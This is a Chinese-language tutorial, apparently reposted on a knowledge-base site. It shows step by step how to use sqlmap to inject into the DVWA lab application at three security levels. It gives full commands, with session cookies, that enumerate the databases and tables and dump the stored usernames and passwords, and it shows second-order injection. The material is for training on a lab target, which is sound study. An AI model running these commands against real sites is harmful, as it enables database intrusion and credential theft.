Sqlmap自动化注入的示例分析

Sqlmap自动化注入的示例分析

使用sqlmap对dvwa进行自动化注入
设置dvwa级别为low

  1. 打开dvwa的SQL Injection(SQL Injection (Blind)),打开浏览器调试,输入user id并submit,查看拦截到的请求。

  2. 可以看到是一条GET请求,url“http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

  3. 我们直接放到salmap测试一下,使用-u命令 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#”

  4. 可以看到这里是需要登录的,否则跑不出来。所以我们需要添加一个cookie维持登录

6.使用burp suite代理抓包,获取登录的cookie,添加–dbs 爆数据 -u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” — cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” –dbs

可以看到爆出来的数据库是mysql

7. 我们用-D xxx指定查看的数据库,用–tables查看该数据库的所有表:-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa –tables

查看跑出来的结果:

8.我们用-D xxx -T ttt指定查看的表,用–columns查看表的列

-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users –columns

9.我们用-D xxx查看数据库, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的数据

-u “http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#” –cookie=”PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low” -D dvwa -T users -C password,user –dump

  • 将dvwa安全等级调为medium将抓取的数据包保存为.txt文件,放到sqlmap的目录下,直接-r 文件名 –dbs(后续的参数自己添加即可)

  • 将dvwa 安全等级调为high。由于这次的提交页面跟返回结果的页面不是同一个页面,所以之前的那种方法在这里不能用了。要使用二阶注入的方法

  • 提交数据的网址

  • 返回的网址

将抓取的数据包保存为.txt文件,放到sqlmap的目录下,爆数据库,命令: -r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 –dbs

爆表名

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” – -batch –level 2 -D dvwa –tables

爆列名

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/”

— batch –level 2 -D dvwa -T user –columns

爆字段数据

-r 1.txt –second-url “http://192.168.1.222:8089/vulnerabilities/sqli/” — batch –level 2 -D dvwa -T users -C user,password –dump

  • 一些概念问题:

  • 二阶注入:二阶sql注入–second-order有些时候注入点输入的数据看返回结果的时候并不是 当前的页面,而是另外的一个页面, 这时候就需要你指定到哪个页面获取响应判断真假。–second-url 后面跟一个返回的页面的URL地址

  • –batch:自动默认配置,不用手动按yes or no

  • level :Sqlmap一共有5个探测等级,默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload非常多,会自动破解出cookie、XFF等头部注入。当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP User-Agent/Referer头在level为3时就会测试。在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5(速度也随之变慢)

以上就是Sqlmap自动化注入的示例分析,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

文章标题:Sqlmap自动化注入的示例分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/26232

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云认证作者
上一篇 2022年9月16日 下午10:42
下一篇 2022年9月16日 下午10:43

相关推荐

  • uniapp地图组件map怎么使用

    首先引入map组件 <template> <view class=”content”> <map :layer-style=’5′ : :show-location=’true’ :latitude=”latitude” :longitude=”longitude” :…

    2022年9月20日
    89400
  • mysql增加的语句是什么

    增加语句有:1、CREATE DATABASE语句,用于增加数据库,语法“CREATE DATABASE 数据库名;”;2、CREATE TABLE语句,用于增加数据表,语法“CREATE TABLE 表名(列名 类型);”;3、ALTER TABLE语句,可向数据表添加字段,语法“ALTER TA…

    2022年9月21日
    53900
  • Redis处理接口幂等性的方案有哪些

    前言:接口幂等性问题,对于开发人员来说,是一个跟语言无关的公共问题。对于一些用户请求,在某些情况下是可能重复发送的,如果是查询类操作并无大碍,但其中有些是涉及写入操作的,一旦重复了,可能会导致很严重的后果,例如交易的接口如果重复请求可能会重复下单。接口幂等性是指用户对于同一操作发起的一次请求或者多次…

    2022年8月31日
    82100
  • 电脑0x80070035找不到网络路径怎么解决

    解决0x80070035找不到网络路径的方法 方法一: 1、我们先单击“网络”,“打开网络和Internet设置” 2、接着我们选择下“网络和共享中心” 3、接着我们选择“更改高级共享设置” 4、接着我们勾选“启用共享以便可以访问网络的用户读取公用文件夹中的文件” 5、到了“网络和共享中心”,我们直…

    2022年9月15日
    1.6K00
  • 笔记本电脑键盘打不出字怎么解决

    笔记本键盘打不出字多种解决方法 名列前茅种方法 1、先按住【Fn键】(Fn键一般在键盘的左下角),再按【Num Lk】(Num Lk一般在右上角,F11键的上面,当然不同的笔记本所在位置有所不同),我们可以按这二个组合键进行字母变数字,这也是最常用的方法。 2、点击【开始】菜单,然后选择【程序】,然…

    2022年9月6日
    6.1K00
  • Vue前端怎么整合ElementUi

    Vue前端整合Element Ui Element UI 是一套采用 Vue 2.0 作为基础框架实现的组件库,一套为开发者、设计师和产品经理准备的基于 Vue 2.0 的组件库,提供了配套设计资源,帮助网站快速成型。 1.安装Element Ui组件库 WIN+R输入CMD(必须以管理员身份运行)…

    2022年9月21日
    42100
  • 如何分析APP测试及流程

    目前工作中,测试App会涉及到一下几个方面:客户端、小程序、h6页面等,看似不同却又大相径庭。 点击添加图片描述(非常多60个字) 1、功能模块测试:功能模块测试其实最重要的是考察测试者的逻辑思维能力和对需求的理解能力以及一些页面交互性,输入输出的考虑等,所以以上三者是共通的,没有太大的区别。 2、…

    2022年9月2日
    52900
  • windows7操作系统有哪些版本

    windows7操作系统分为六个版本:1、Starter版本,只通过OEM计算机预装;2、HomeBasic版本,是win7经过简化的一种版本;3、HomePremium版本,能够给家庭用户提供更多的需求;4、Professional版,支持演示模式、加强的网络功能等等;5、Enterprise版本…

    2022年9月15日
    1.1K00
  • SpringBoot统一返回格式怎么实现

    1. 直接返回结果 先看一下最基本的例子,直接将结果原封不动返回: @Data@AllArgsConstructor@JsonIgnoreProperties(ignoreUnknown = true)public class TestVo { private static final long s…

    2022年8月31日
    66000
  • windows驱动精灵安装目录无效请重新指定如何解决

    解决方法: 方法一: 很多情况下是因为从U盘上复制来驱动之后,没有及时将U盘拔掉。 应该及时拔下U盘,再次尝试点击安装。 方法二: 如果安装的驱动与你的系统不匹配也会造成这种原因。 尝试重新下载对应的驱动,再次进行安装。 方法三: 1、进入驱动精灵点击右上角三横。 2、在下拉任务中点击“设置”。 3…

    2022年9月10日
    1.2K00
注册PingCode 在线客服
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部